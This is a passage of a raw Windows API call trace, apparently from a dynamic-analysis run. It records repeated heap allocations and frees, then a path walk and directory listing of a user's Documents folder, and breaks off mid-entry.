hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\") returned="p6Wk0rU_y\\" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\") returned="P63p r8YwN7PV\\" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb6e0 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb6e0 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.602] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.602] PathFindFileNameW (pszPath="") returned="" [0097.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.602] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x221ba440, ftCreationTime.dwHighDateTime=0x1d5c3ed, ftLastAccessTime.dwLowDateTime=0x4bb1d850, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0x4bb1d850, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.603] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x221ba440, ftCreationTime.dwHighDateTime=0x1d5c3ed, ftLastAccessTime.dwLowDateTime=0x4bb1d850, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0x4bb1d850, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.603] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, 